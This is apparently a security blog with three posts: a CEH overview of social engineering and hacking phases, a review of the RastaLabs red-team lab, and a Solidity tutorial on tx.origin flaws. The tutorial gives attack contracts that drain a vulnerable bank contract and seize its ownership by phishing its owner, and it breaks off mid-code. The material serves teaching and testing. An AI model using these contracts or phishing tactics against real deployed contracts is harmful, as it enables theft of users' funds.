Monday, June 5, 2023

CEH: Fundamentals Of Social Engineering


Social engineering is a nontechnical method of breaking into a system or network. It's the process of deceiving users of a system and convincing them to perform acts useful to the hacker, such as giving out information that can be used to defeat or bypass security mechanisms. Social engineering is important to understand because hackers can use it to attack the human element of a system and circumvent technical security measures. This method can be used to gather information before or during an attack.

A social engineer commonly uses the telephone or Internet to trick people into revealing sensitive information or to get them to do something that is against the security policies of the organization. By this method, social engineers exploit the natural tendency of a person to trust their word, rather than exploiting computer security holes. It's generally agreed that users are the weak link in security; this principle is what makes social engineering possible.

The most dangerous part of social engineering is that companies with authentication processes, firewalls, virtual private networks, and network monitoring software are still wide open to attacks, because social engineering doesn't assault the security measures directly. Instead, a social-engineering attack bypasses the security measures and goes after the human element in an organization.

Types of Social Engineering Attacks

There are two types of social engineering attacks:

Human-Based 

Human-based social engineering refers to person-to-person interaction to retrieve the desired information. An example is calling the help desk and trying to find out a password.

Computer-Based

Computer-based social engineering refers to using computer software to retrieve the desired information. An example is sending a user an email asking them to re-enter a password on a web page to confirm it. This social-engineering attack is also known as phishing.

Human-Based Social Engineering

Human-based social engineering is further categorized as follows:

Impersonating an Employee or Valid User

In this type of social-engineering attack, the hacker pretends to be an employee or valid user on the system. A hacker can gain physical access by pretending to be a janitor, employee, or contractor. Once inside the facility, the hacker gathers information from trashcans, desktops, or computer systems.

Posing as an Important User

In this type of attack, the hacker pretends to be an important user such as an executive or high-level manager who needs immediate assistance to gain access to a computer system or files. The hacker uses intimidation so that a lower-level employee such as a help desk worker will assist them in gaining access to the system. Most low-level employees won't question someone who appears to be in a position of authority.

Using a Third Person

Using the third-person approach, a hacker pretends to have permission from an authorized source to use a system. This attack is especially effective if the supposed authorized source is on vacation or can't be contacted for verification.

Calling Technical Support

Calling tech support for assistance is a classic social-engineering technique. Help desk and technical support personnel are trained to help users, which makes them good prey for social-engineering attacks.

Shoulder Surfing 

Shoulder surfing is a technique of gathering passwords by watching over a person's shoulder while they log in to the system. A hacker can watch a valid user log in and then use that password to gain access to the system.

Dumpster Diving

Dumpster diving involves looking in the trash for information written on pieces of paper or computer printouts. The hacker can often find passwords, filenames, or other pieces of confidential information.

Computer-Based Social Engineering

Computer-based social-engineering attacks can include the following:
  • Email attachments
  • Fake websites
  • Pop-up windows


Insider Attacks

If a hacker can't find any other way to hack an organization, the next best option is to infiltrate the organization by getting hired as an employee or finding a disgruntled employee to assist in the attack. Insider attacks can be powerful because employees have physical access and are able to move freely about the organization. An example might be someone posing as a delivery person by wearing a uniform and gaining access to a delivery room or loading dock. Another possibility is someone posing as a member of the cleaning crew who has access to the inside of the building and is usually able to move about the offices. As a last resort, a hacker might bribe or otherwise coerce an employee to participate in the attack by providing information such as passwords.

Identity Theft

A hacker can pose as an employee or steal the employee's identity to perpetrate an attack. Information gathered in dumpster diving or shoulder surfing in combination with creating fake ID badges can gain the hacker entry into an organization. Creating a persona that can enter the building unchallenged is the goal of identity theft.

Phishing Attacks

Phishing involves sending an email, usually posing as a bank, credit card company, or other financial organization. The email requests that the recipient confirm banking information or reset passwords or PINs. The user clicks the link in the email and is redirected to a fake website. The hacker is then able to capture this information and use it for financial gain or to perpetrate other attacks. Emails that claim the senders have a great amount of money but need your help getting it out of the country are examples of phishing attacks. These attacks prey on the common person and are aimed at getting them to provide bank account access codes or other confidential information to the hacker.

Online Scams

Some websites that make free offers or other special deals can lure a victim to enter a username and password that may be the same as those they use to access their work system.
The hacker can use this valid username and password once the user enters the information in the website form. Mail attachments can be used to send malicious code to a victim's system, which could automatically execute something like a software keylogger to capture passwords. Viruses, Trojans, and worms can be included in cleverly crafted emails that entice a victim to open the attachment. Mail attachments are considered a computer-based social-engineering attack.

PHASES OF HACKING

What is the process of hacking, or what are the phases of hacking?
Hacking is broken up into six phases. The more closely you follow all the phases, the stealthier your attack will be.

1. Reconnaissance - This is the primary phase of hacking, where the hacker tries to collect as much information as possible about the target. It includes identifying the target, the target's domain name registration records, mail server records, and DNS records. Tools widely used in this process are NMAP, Hping, Maltego, and Google Dorks.

2. Scanning - This makes up the base of hacking! This is where planning for the attack actually begins! The tools used in this process are Nessus, Nexpose, and NMAP. After reconnaissance, the attacker scans the target for running services, open ports, firewalls, vulnerabilities, and the operating system.

3. Gaining Access - In this phase the attacker executes the attack based on the vulnerabilities identified during scanning! If successful, he gains access to the target network or enters the system. The primary tool used in this process is Metasploit.

4. Maintaining Access - This is the phase where the hacker has already gained access to a system. After gaining access, the hacker installs backdoors in order to re-enter the owned system whenever he needs access in the future. Metasploit is the preferred tool in this process.

5. Clearing Tracks or Covering Tracks - To avoid being traced and caught, the hacker clears all tracks by clearing all kinds of logs, deleting the uploaded backdoor, and removing anything else from the process that may later reveal his presence!

6. Reporting - Reporting is the last step in finishing the ethical hacking process. Here the ethical hacker compiles a report of his findings and the work that was done, such as the tools used, the success rate, vulnerabilities found, and the exploit process.

Sunday, June 4, 2023

The RastaLabs Experience

Introduction


It was 20 November, and I was just starting to wonder what I would do during the next month. I had already left my previous job, and the new one would only start in January. Playing with PS4 all month might sound fun for some people, but I knew I would get bored quickly.

Even though I have some limited red teaming experience, I always felt that I wanted to explore the excitement of getting Domain Admin – again. I got my first DA in ~2010 using pass-the-hash, but that was a loooong time ago, and things change quickly.
While reading the backlogs of one of the many Slack rooms, I noticed that certain chat rooms were praising RastaLabs. Looking at the lab description, I felt "this is it, this is exactly what I need." How hard could it be, I have a whole month ahead of me, surely I will finish it before Christmas. Boy, was I wrong.



The one-time fee of starting the lab is 90 GBP which includes the first month, then every additional month costs 20 GBP. I felt like I was stealing money from Rastamouse and Hackthebox... How can it be so cheap? Sometimes cheap indicates low quality, but not in this case.



My experience


Regarding my previous experience, I already took OSCP, OSCE, SLAE (Securitytube Linux Assembly Expert), and PSP (Powershell for Pentesters), all of which helped me a lot during the lab. I also had some limited red teaming experience. I had more-than-average experience with AV evasion, and I already had experience with the new post-exploit frameworks like Covenant and Powershell Empire. As for writing exploits, I knew how a buffer overflow or a format string attack worked, but I lacked practice in bypassing ASLR and NX. I basically had zero experience with Mimikatz on Windows 10. I used Mimikatz back in 2012, but probably not since. I also had a lot of knowledge on how to do X and Y, on useful tools and hot techniques, but I lacked recent experience with them. Finally, I am usually the last when it comes to speed in hacking, but I have always balanced my lack of speed with perseverance.

RastaLabs starts in 3,2,1 ...


So I paid the initial entry fee, got the VPN connection pack, connected to the lab, and got my first flag after ... 4 days. And there were 17 of them in total. This was the first time I started to worry. I did everything to keep myself on the wrong track, stupid things like assuming incorrect lab network addresses, scanning too few machines, finding the incorrect breadcrumbs via OSINT, trying to exploit a patched web service (as most OSCPers would do), etc. I was also continually struggling with the tools I was using, as I never knew whether they were buggy, or I was misusing them, or this is just not the way to get the flag. I am sure someone with luck and experience could have done this stage in 2-3 hours, but hey, I was there to gain experience.

During the lab, whenever I got stuck with the same problem for more than 30-40 hours and my frustration was running high, I pinged Rastamouse on the official RastaLabs support channel on https://mm.netsecfocus.com/. I usually approached him like "Hi, I tried X, Y, and Z but no luck", then he replied "yeah, try Y harder". This kind of information was usually all I needed, and 2-3 hours later I was back on track again. His help was always enough, but never too much to spoil the fun. The availability and professionalism of Rastamouse was 10/10. Huge multi-billion dollar companies fail to provide good enough support, this one guy here was always there to help. Amazing. I highly recommend joining the Mattermost channel – it will help you a lot to see that you are not the only one stuck with problems. But please do not DM him or the channel if you have not already tried harder.

What's really lovely in the lab is that you can expect real-world scenarios with "RastaLabs employees" working on their computer, reading emails, browsing the web, etc. I believe it is not a spoiler here that at some point in time you have to deliver malware that evades the MS Defender AV on the machine. Yes, there is a real working Defender on the machines, and although it is a bit out of date, it might catch your default payload very quickly. As I previously mentioned, luckily I had recent experience with AV evasion, so this part was not new to me. I highly recommend setting up your own Win10 with the latest Defender updates and testing your payload on it first. If it works there, it will work in the lab. This part can be especially frustrating, because the only feedback you get from the lab is that nothing is happening, and there is no way to debug it. Test your solution locally first.

Powershell Empire turned out to be an excellent solution for me, the only functionality it lacked was Port Forwarding. But you can drop other tools to do this job efficiently.

A little help: even if you manage to deliver your payload and you have a working C&C, it does not mean your task with AV evasion is over. It is highly probable that Defender will block your post-exploit codes. To bypass this, read all the blog posts from Rastamouse about AMSI bypass. This is important.

Lateral movement


When you finally get your first shell back ...



A whole new world starts. From now on, you will spend significant time on password cracking, lateral movement, persistence, and figuring out how Windows AD works.
In the past, I played a lot of CTF, and from time to time I got the feeling "yeah, even though this challenge was fun, it was not realistic". This never happened during RastaLabs. All the challenges and solutions were 100% realistic, and as the "Ars poetica" of RastaLabs states:



...which is sooooo true. None of the tasks involve any exploit of any CVE. You need a different mindset for this lab. You need to think about misconfigurations, crackable passwords, privilege abuse, and similar issues. But I believe this lab is still harder to own than 90% of the organizations out there. The only help is that there are no blue-teamers killing our shells.

About the architecture of the lab: When connecting to the lab with VPN, you basically found yourself in a network you might label as "Internet", with your target network being behind a firewall, just as a proper corporate network should be.
There are a bunch of workstations – Win10 only, and some servers like fileserver, exchange, DC, SQL server, etc. The majority of servers are Windows Server 2016, and there is one Linux server. The two sites are adequately separated and firewalled.

As time passed, I was getting more and more flags, and I started to feel the power. Then the rollercoaster experience started. I was useless, I knew nothing. Getting the flag, I was god. One hour later, I was useless.



For example, I spent a significant amount of time trying to get GUI access to the workstations. In the end, I managed to get that, just to find out I did not achieve anything with it. For unknown reasons, none of the frameworks I tried had a working VNC, so I set up my own, and it was pain.

On December 18, I finally got Domain Admin privileges. So my estimation to "finish the lab" in one month was not that far off. Except that I was far from finishing it, as I still had to find five other flags I was missing. You might ask "you already have DA, how hard could it be to find the remaining five?". Spoiler alert, it was hard. Or to be more precise, not hard, just challenging, and time-consuming. This was also a time when connections on Mattermost RastaLabs channel helped me a lot. Hints like "flag X is on machine Y" helped me keep motivated, yet it did not spoil the fun. Without hints like this, I would not have written this post but would have been stuck with multiple flags.

About exploitation


And there was the infamous challenge, "ROP the night away." This was totally different from the other 16. I believe this image explains it all:


If you are not friends with GDB, well, you will have a hard time. If you don't have lots of hands-on experience with NX bypass - a.k.a ROP - like me, you will have a hard time with this challenge. The binary exploit challenges during OSCP and OSCE exams are nowhere near as complex as this one. If you have OSEE, you will be fine. For this challenge, I used GDB-Peda and Python pwntools – check them out in case you are not familiar with them. For me, solving this challenge took about 40 hours. Experienced CTF people could probably solve it in 4 hours or less.

Conclusion


I would not recommend taking this lab for total beginners *. I also do not recommend doing the lab if you only have limited time per day, which is especially true if you are working on your home computer. I probably would have saved hours or even days if I had set up a dedicated server in the cloud for this lab. The issue was that the lab workstations were rebooted every day, which meant that I always lost my shells. "Persistence FTW", you might say, but if your C&C is down when the workstation reboots, you are screwed. "Scheduled tasks FTW", you might say, but unless you have a strict schedule on when you start your computer, you will end up with a bunch of scheduled tasks just to get back the shell whenever you start your computer. Day after day I spent the first hour getting back to where I had been the day before. And I just figured out at the end of the lab why some of my scheduled tasks were not working ...

I would be really interested to see how much time I spent connected to the lab. Probably it was around 200–250 hours in total, which I believe is more than I spent on OSCP and OSCE combined. But it was totally worth it. I really feel the power now that I learned so many useful things.

But if you consider that the price of the one-month lab is 20 GBP, it is still a very cheap option to practice your skills. 
* It is totally OK to do the lab in 6 months, in case you start as a beginner. That is still just 190 GBP for the months of lab access, and you will gain a lot of experience during this time. You will probably have a hard time reaching the point when you have a working shell, but it is OK. You can find all the information on Google, you just need time, patience and willingness to get there.

Anyway, it is still an option not to aim to "get all the flags". Even just by getting the first two flags, you will gain significant experience in "getting a foothold". But for me, not getting all the flags was never an option.



If you are still unconvinced, check these other blog posts:

Or see what others wrote about RastaLabs.


Footnote


In case you start the lab, please, pretty please, follow the rules, and do not spoil the fun for others. Do not leave your tools around, do not keep shared drives open, do not leave FLAGs around. Leave the machine as it was. If you have to upload a file, put it in a folder others won't easily find. This is a necessary mindset when it comes to real-world red teaming. Don't forget to drop a party parrot into the chat whenever you or someone else gets a new flag. And don't forget:
OSCP has no power here. Cry harder!

I will probably keep my subscription to the lab and try new things, new post-exploit frameworks. I would like to thank @_rastamouse for this great experience, @superkojiman for the ROP challenge. Hackthebox for hosting the lab with excellent uptime.
As for @gentilkiwi and @harmj0y, these two guys probably advanced red-teaming more than everyone else combined together. pwntools from @gallopsled was also really helpful. And I will be forever grateful to Bradley from finance for his continuous support whenever I lost my shells.


Smart Contract Hacking Chapter 6 - Phishing Users With Malicious DAPS Via TX.Origin


Authorization on a smart contract can sometimes be a tricky endeavor. There are many things that are easily coded incorrectly, for example public functions, unpublished functions, delegate calls and tx.origin validations. If any of these are implemented incorrectly, then contracts are often left vulnerable to both direct and indirect attacks.

In this case, we will be talking about tx.origin which is an indirect attack method an attacker can utilize to bypass authorization based on the nuance of what is actually checked vs what the developer may think is checked when implementing require statements with tx.origin for authorization.

There are two different ways to check the address of who is making a call to a contract.

  • msg.sender
  • tx.origin

While both of these could produce the same output when directly calling a contract, they may differ when there is another contract in the middle of the transaction. For example, suppose you play an online game which calls another contract to handle a payout transaction. When the payout contract checks msg.sender, the winning payout would go to the game's address, because the game contract is what called the payout contract.

If the same address was checked with tx.origin on the payout contract, it would go all the way back to the original users address that processed the payout transaction on the game rather than the game contract making the call.

 

Man In the Middle Via tx.origin

This type of check is often misused when validating authorization on smart contracts. When a tx.origin check is used instead of msg.sender, it can leave a contract open to a man-in-the-middle (MITM) attack vector. Let's take a look at a visual representation of an attack, which will help put this into perspective. Then we will look at some code that implements this functionality.

 

In the below image we have:
  • A user on the left
  • An attacker's contract in the middle
  • A target contract on the right

If the attacker were to call the target contract directly, his authorization would be checked based on his personal address value regardless of whether the check is performed via msg.sender or tx.origin. However, if the attacker created his own contract that called the target contract, the attacker could run a phishing campaign and social engineer the user into running functionality on the attacker's contract.

For example, sending a user to a game or accepting a payment for services and proxying the request to the target contract. If the user is social engineered into using the attacker's contract, the attacker's contract would make a transaction call to the target contract that, as far as tx.origin is concerned, originates from the user's address.

This is the exact point where things can go sideways. If the target contract processes the transaction via msg.sender, then the attacker's contract would be authorized as the attacker's contract address. However, if the contract checks authorization via tx.origin, then the attacker is accessing the target as the victim's address and can bypass any authorization checks and simply process functionality as the victim user, to the attacker's benefit.

This attack could be used to liquidate a user's account with a transfer function from the authorized user to the attacker's account, or to access forbidden functionality such as a self-destruct function guarded by administrator-only validation, or perhaps to update admin functionality to provide the attacker with full access to the contract. Much like social engineering in a standard network penetration test, this could be a wide-scale phishing campaign to affect all standard users, or a spear phishing attack targeting an administrative user.

Regardless of the attacker's motivations, there are many bad things that can happen. So let's take a look at a very simple example of tx.origin just so you see the difference between msg.sender and tx.origin. We want to make sure you fully understand how this functionality actually works so you can spot it during your testing before we exploit it.
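The flaw described above is easiest to see as a before-and-after pair. The following is an added example, not code from this chapter: two minimal wallet contracts whose only difference is which address the owner check compares against. The contract and function names (VulnerableWallet, HardenedWallet, withdrawAll) are assumptions made for illustration.

```solidity
pragma solidity ^0.6.6;

// Added example (not from the chapter). Both wallets store the deployer as
// owner and let the owner drain the balance to an address of their choice.

// VULNERABLE: the guard compares tx.origin, the externally owned account
// that started the whole transaction. If the owner is lured into calling
// any contract that forwards a call here, tx.origin is still the owner's
// address, so the forwarding contract passes the check.
contract VulnerableWallet {
    address payable public owner;

    constructor() public payable {
        owner = msg.sender;
    }

    receive() external payable {}

    function withdrawAll(address payable to) public {
        require(tx.origin == owner, "not owner"); // flawed: originator, not caller
        to.transfer(address(this).balance);
    }
}

// HARDENED: the guard compares msg.sender, the immediate caller. A forwarding
// contract is then checked as itself (its own address), not as whoever
// originally signed the transaction, so the phishing path fails.
contract HardenedWallet {
    address payable public owner;

    constructor() public payable {
        owner = msg.sender;
    }

    receive() external payable {}

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner"); // correct: immediate caller
        _;
    }

    function withdrawAll(address payable to) public onlyOwner {
        to.transfer(address(this).balance);
    }
}
```

In Remix, deploy each wallet with some value from account one and call withdrawAll directly from that account: both succeed, which is why the bug is invisible in a direct test. Route the same call through any intermediary contract and the difference appears: the tx.origin version still pays out, the msg.sender version reverts with "not owner". During a review, search for tx.origin inside require statements and modifiers; the one idiom that is generally defensible is require(msg.sender == tx.origin) used to reject contract callers, and even that trades away composability for every legitimate contract wallet.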

 

Simple tx.origin Example Walkthrough:

Action Steps:
  • Type out the following 2 contracts into Remix
  • Deploy the HelloWorldTXOrigin contract first and copy its address value
  • Place the address value in the proper location within the CallHello contract and deploy it
  • Review the code within CallHello and its usage of address validation
  • Review the calls into HelloWorldTXOrigin that are affected by the address validation
  • Try to reason, based on what you learned above, how this works and where and what the issues could be

 

 

1.  pragma solidity ^0.6.6;
2.
3.  contract HelloWorldTXOrigin {
4.
5.      function return_TX_Address() public returns(address){
6.          address myaddress = tx.origin;   // account that started the whole transaction
7.          return myaddress;
8.      }
9.
10.     function return_MSG_Address() public returns(address){
11.         address myaddress = msg.sender;  // immediate caller, which may be a contract
12.         return myaddress;
13.     }
14. }

 

The code above for HelloWorldTXOrigin is extremely simple. All the code does is set a variable on lines 6 and 11 to the address calling the function and returns the value.  On line 6 it uses the tx.origin value and on line 11 it uses the msg.sender.

Now take a look at the following contract which calls the above contract to illustrate the difference between msg.sender and tx.origin values.  

 

1.  pragma solidity ^0.6.6;
2.
3.  interface targetInterface {
4.      function return_TX_Address() external returns(address);
5.      function return_MSG_Address() external returns(address);
6.  }
7.
8.  contract Call_Hello {
9.      targetInterface helloInterface = targetInterface(ADD_Address_Here); // paste the deployed HelloWorldTXOrigin address here
10.
11.     function myTX() public returns (address){
12.         return helloInterface.return_TX_Address();
13.     }
14.
15.     function myMSG() public returns (address){
16.         return helloInterface.return_MSG_Address();
17.     }
18. }

 

The Call_Hello contract above calls the HelloWorld contract via an interface defined on line 3 and initialized to a variable named helloInterface on line 9.

All this contract does is call functions from HelloWorld on lines 12 and 16 and return the address values of tx.origin or msg.sender. Presumably the caller would be a random user that you social engineered into using this contract.

Action Steps:

- Select the first account in the dropdown list

- Compile and deploy the HelloWorldTXOrigin.sol contract via Remix

- Copy the address of the deployed HelloWorldTXOrigin contract

- Paste that address into the target interface address placeholder (ADD_Address_Here) in Call_Hello

- Select the second account in the dropdown list

- Compile and deploy Call_Hello.sol

- Select any other account to simulate the victim calling the attacker's Call_Hello contract

- Press myMSG and then myTX; after each, review the address in the transaction's decoded output and walk through in your head what you are looking at before moving on.

 

If you performed the above action steps you will have noticed something similar to the following. First, I deploy my target contract with account one, which got deployed to the address:

 

- 0xdCDB4db4a54F689ECC486d8BAcC08Cde4AC7FcA8

 



Next, I replace the address in the following line of the attacker's phishing contract Call_Hello with the address from above, using the copy button to the right of the deployed contract in Remix:

 

targetInterface helloInterface = targetInterface(0xdCDB4db4a54F689ECC486d8BAcC08Cde4AC7FcA8);

 

I then switch to account two and deploy the attacker's phishing contract. This gives us the attacker's contract address:

 

- 0x4e1426490dBfBa9110064fb912fe7221074cC0c9

 



 

Finally, I switch to the third account (my social-engineered victim account), with the address:

 

- 0x00bff3B21f6924D6e639Ce60e4Dac62Ec2c21269

 

 


 

If I then click the myMSG button on the attacker's contract I should get the attacker's contract address back, because msg.sender resolves to the address that made the call. In this case the victim calls the attacker's contract, but it is the attacker's contract that actually makes the call into the target contract, so the msg.sender seen by the target is the attacker's contract even though our victim is the one clicking the button. Indeed, this is true, as shown below: the attacker's contract address is returned when the target reads msg.sender.

___________________________________________________________________________________

 

decoded output     {

 "0": "address: 0x4e1426490dBfBa9110064fb912fe7221074cC0c9"

}

___________________________________________________________________________________

 

Next I click the myTX button, which should return the victim's address from the third account, because tx.origin is the account that originally signed the transaction, not the attacker's contract making the call. Indeed, this is true, as shown below: the victim's account address is returned when the target reads tx.origin.

___________________________________________________________________________________

 

decoded output     {

"0": "address: 0x00bff3B21f6924D6e639Ce60e4Dac62Ec2c21269"

}

___________________________________________________________________________________

  

I hope that clears up any confusion about the difference between msg.sender and tx.origin. We will now take a look at a more comprehensive example with a bit of vulnerable code, to put this into context and show how to bypass some controls using this attack method.
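The same rule holds at any call depth: tx.origin stays fixed for the whole transaction while msg.sender changes at every hop. To make that visible in a single transaction, here is an added example that is not part of the original chapter (the contract names Outer, Middle and Target and the Seen event are my own choices). Each contract emits the pair of addresses it observes before calling the next one down.

```solidity
pragma solidity ^0.6.6;

// Added example, not the chapter's code: a three-hop call chain
//   EOA -> Outer -> Middle -> Target
// where every hop logs the msg.sender and tx.origin it sees.

contract Target {
    event Seen(string hop, address msgSender, address txOrigin);

    function probe() external {
        // Hop 3: msg.sender is Middle, tx.origin is still the EOA
        emit Seen("Target", msg.sender, tx.origin);
    }
}

contract Middle {
    Target target;
    event Seen(string hop, address msgSender, address txOrigin);

    constructor(address targetAddress) public {
        target = Target(targetAddress);
    }

    function probe() external {
        // Hop 2: msg.sender is Outer, tx.origin is the EOA
        emit Seen("Middle", msg.sender, tx.origin);
        target.probe();
    }
}

contract Outer {
    Middle middle;
    event Seen(string hop, address msgSender, address txOrigin);

    constructor(address middleAddress) public {
        middle = Middle(middleAddress);
    }

    function probe() external {
        // Hop 1: msg.sender == tx.origin == the EOA that signed the transaction
        emit Seen("Outer", msg.sender, tx.origin);
        middle.probe();
    }
}
```

Deploy Target first, then Middle with Target's address, then Outer with Middle's address, and call Outer.probe() from any Remix account. In the transaction's logs you should see three Seen events whose txOrigin field is the same account each time, while msgSender is that account for Outer, Outer's address for Middle, and Middle's address for Target. That is exactly why an authorization check on tx.origin cannot tell a user apart from a contract the user was tricked into calling.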

Action Steps:

- Review this code prior to reading the explanation.

- What is wrong with the logic in this contract?

- What would your path of exploitation be?

- What would the impact of this attack be?

- Type this code into Remix and follow along with the walkthrough


Simple Example Video Walk Through: 


 

Vulnerable TX.Origin Example Walkthrough:

1.    pragma solidity ^0.6.6;
2.   
3.    contract BankOfEther {
4.      address owner;
5.      mapping (address =>uint) balances;
6.       
7.      constructor() public {
8.        owner = msg.sender;
9.      }
10.    
11.  function deposit() public payable{
12.    balances[msg.sender] = balances[msg.sender]+msg.value;     
13.   }
14.    
15.  function transferTo(address payable to, uint amount) public payable{
16.      require(tx.origin == owner);
17.      to.transfer(amount);
18.  }
19.    
20.  function changeOwner(address newOwner) public{
21.      require(tx.origin == owner);
22.      owner = newOwner;
23.  }
24.    
25.  function kill() public {
26.      require(msg.sender == owner);
27.      selfdestruct(msg.sender);
28.  }
29.}

 

Above is an example of a contract that uses tx.origin to check for user authorization. On lines 16 and 21 you will see that in order to transfer contract funds or change the owner of the contract, you need to be the owner. Both checks use the tx.origin value. The owner that is checked against is set in the constructor on line 8 when the contract is deployed.

Also note the kill function at line 25, which uses Solidity's built-in selfdestruct. It destroys the contract, making it unusable, and sends any remaining contract ether to the address specified (here msg.sender). Unlike the other two privileged functions, kill checks authorization against the owner via msg.sender rather than tx.origin, which will matter later.

 

Action steps to familiarize yourself with the contract:

- Type the code above into Remix and deploy it

- Change the value field to 10 and the denomination to ether

- Deposit the 10 ether with the deposit function

- Switch accounts and try to run the changeOwner, kill and transferTo functions

- Try the same thing with the original account

- Try to deposit funds again

 

In your exploration of the contract you will notice that these functions do not run with the second account, because the second account is not the owner of the contract. They do run with the first account, because the account that deployed the contract was set as the owner in the constructor. You will also notice that running kill rendered the contract unusable and returned the contract's ether from your initial deposit to your account.

Now we are familiar with the contract's functionality, and we know that it dangerously checks authorization using tx.origin in both the transferTo and changeOwner functions. What would we do to attack this?

In order to formulate an attack, we will use a standard phishing-style attack via social engineering, exactly as if we were contracted to perform social engineering on a penetration test. The difference is that the malicious site we send our victim communicates on the backend with our malicious smart contract, which acts as a proxy into the vulnerable contract, for example through a decentralized application (DApp) that makes web3.js calls. We used web3.js calls in an earlier chapter when making calls directly to a contract.

How we attack this would depend on our motivations as an attacker. We could simply trick the contract owner into running functionality on our malicious contract which then transfers all of the funds out of the contract to the attacker's wallet. The owner may not even notice this attack took place until he had issues with account balances. He may not even realize when and how it happened depending on how you orchestrate your attack. We could also take control of the whole contract and become the owner of the contract which would provide us with unfettered access to sensitive functionality at any time.

Let's take a look at a malicious smart contract that could transfer funds out of the target and additionally give us full administrative control of it. In a live attack scenario we would generally wrap this attacker's contract in a nice-looking DApp page built with web3.js, much like the landing page in a phishing engagement.

1.  pragma solidity ^0.6.6;
2.   
3.  interface targetInterface {
4.  function transferTo(address payable to, uint amount)  payable external;
5.  function changeOwner(address newOwner) external;
6.  function kill() external;
7.  }
8.   
9.  contract PhishingBankOfEther {
10.  address payable attackerAddress;
11.    
12.  constructor() public {
13.     attackerAddress = msg.sender;
14.  }
15.    
16.  targetInterface bankInterface = targetInterface(ADDRESS);
17. 
18.  function test () payable public {
19.     bankInterface.transferTo(attackerAddress, 1 ether);
20.     bankInterface.changeOwner(attackerAddress);
21.  }
22.}

 

Most of the contract above is setting up the target interface, so this should be easy to follow if you read through the section on Reentrancy, where we set up an interface in our attacking contract. To review: an interface is how we call functions on another contract given its address and function signatures. On lines 3-7 we create an interface by copying the function definitions from our target contract into the interface definition. That's it. Then on line 16 we point that interface at the address of the target contract and name it bankInterface. That is really all we are doing for 75% of this contract. Nothing new or scary.

At this point we can use the bankInterface variable to access functionality within the target contract from our attacking contract.  Pretty simple right?  

Now the actual meat of this attacking contract is within lines 18-21, where the test function calls the transferTo and changeOwner functions that we do not have access to as a non-owner. Note the order: the transfer is made first, while the victim is still the owner, and only then is ownership changed, because once owner is set to the attacker's address the tx.origin check would no longer pass for calls originating from the victim.

 

Action Steps:

- Re-deploy the target contract with your first account in Remix

- Deposit 10 ether into the target contract

- Copy the address of the target contract via the copy button on the right side of the deployed contract

- Within the attacking contract, replace ADDRESS with the copied address of the target

- Switch to the second account in your list of accounts

- Deploy this contract and you will see a single function named test

 

As before, from your attacker's account you cannot run functionality that performs authorization checks, because the attacker's address is not the owner, so running this test function, which changes the owner and sends 1 ether, will fail from the second account. However, instead of running this functionality directly, the attacker phishes the owner on account one. The phish gets the owner to call the attacker's contract, which then performs the privileged actions as the owner because of the incorrect tx.origin check.

 

Action steps:

- Switch to the first account

- Try using the transferTo function to verify that it's working and that you're the owner

- Run the test function from the attacker's contract with account 1

- Now try to use transferTo again. Did it work?

- Try to use the kill function. Did that work?

- Now switch to the attacker's account and use transferTo. Did that work this time?

- Now kill the contract from the attacker's account. What happened?

 

So, what happened when you used the test function from the attacker's contract?

The test function called changeOwner and transferTo from the attacker's contract, but authorization was checked via tx.origin, which is the account that sent the transaction to the attacker's contract (account 1, the owner), not the attacker's contract address that BankOfEther sees as msg.sender.

Even with the phishing contract, calling kill from the attacker's contract would have failed, because kill checks msg.sender. So, in order to execute kill, we first had to use changeOwner to become the owner and then call kill directly from the attacker's account.

As a result of phishing the owner into using the attacker's contract, the attacker is now the owner of this target contract. As such, the attacker actually can call the kill function directly without any issues and the original owner has been locked out of administrative functionality. 
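The fix is to authorize on msg.sender, so that the immediate caller is what gets checked. Here is an added example that is not part of the chapter's code: BankOfEther rewritten with an onlyOwner modifier (the modifier, the OwnerChanged event and the extra require checks are my additions). Deployed beside the original and pointed at by the same PhishingBankOfEther, the attacker's test function reverts even when the owner is the one calling it, because the fixed contract sees the phishing contract's address as msg.sender rather than the owner's account.

```solidity
pragma solidity ^0.6.6;

// Added example, not the chapter's code: BankOfEther with every
// authorization check moved from tx.origin to msg.sender.
contract BankOfEtherFixed {
    address payable public owner;
    mapping(address => uint) public balances;

    event OwnerChanged(address indexed oldOwner, address indexed newOwner);

    modifier onlyOwner() {
        // msg.sender is the immediate caller. A phishing contract acting as a
        // proxy fails this check even when the owner signed the transaction,
        // because the proxy's address, not the owner's, is what arrives here.
        require(msg.sender == owner, "not owner");
        _;
    }

    constructor() public {
        owner = msg.sender;
    }

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    // No longer payable: the owner has no reason to attach ether to a withdrawal.
    function transferTo(address payable to, uint amount) public onlyOwner {
        require(amount <= address(this).balance, "insufficient funds");
        to.transfer(amount);
    }

    function changeOwner(address payable newOwner) public onlyOwner {
        require(newOwner != address(0), "zero address");
        emit OwnerChanged(owner, newOwner);
        owner = newOwner;
    }

    function kill() public onlyOwner {
        selfdestruct(owner);
    }
}
```

Repeat the lab against this contract: deposit from account one, deploy the attacker's contract from account two with this contract's address, switch back to account one and press test. The call reverts with "not owner", and transferTo and kill still work for account one afterwards. The owner can of course still be phished into calling transferTo directly through a malicious DApp, but that is a different problem; what this removes is the ability of an unrelated contract to borrow the owner's identity for free.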

In real life we have a couple of different options for attacking this user via a phishing attack over chat, email or even the phone.

Attack Options:

  1. Send the owner a link to a website, perhaps a game they can play on Ethereum, whose backend calls our attacker's contract.
  2. Sell the owner something and get them to send any amount of ether to our contract address. The contract's receive/fallback function then performs the privileged actions on the owner's behalf: simply sending funds to the contract triggers it, and because tx.origin is the owner's address the target accepts the calls.
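Attack option 2 is described above but not shown, so here is an added example that is not part of the chapter's code: the PhishingBankOfEther idea with the privileged calls moved into a receive() function, so the owner only has to "pay" the attacker's contract for the exploit to run. The target address is passed to the constructor instead of being pasted into the source; the interface matches BankOfEther as given in the chapter.

```solidity
pragma solidity ^0.6.6;

// Added example, not the chapter's code: attack option 2, where the
// exploit fires when the victim sends ether to the attacker's contract.

interface targetInterface {
    function transferTo(address payable to, uint amount) external payable;
    function changeOwner(address newOwner) external;
}

contract PhishingBankOfEtherReceive {
    address payable attackerAddress;
    targetInterface bankInterface;

    // Pass the deployed BankOfEther address at deployment time.
    constructor(address target) public {
        attackerAddress = msg.sender;
        bankInterface = targetInterface(target);
    }

    // Runs whenever plain ether arrives with empty calldata. If the sender is
    // the BankOfEther owner, tx.origin inside the target is the owner's EOA,
    // so both tx.origin checks pass even though msg.sender is this contract.
    receive() external payable {
        // Drain first, while the victim is still the owner. If changeOwner ran
        // first, owner would already be the attacker and the victim's tx.origin
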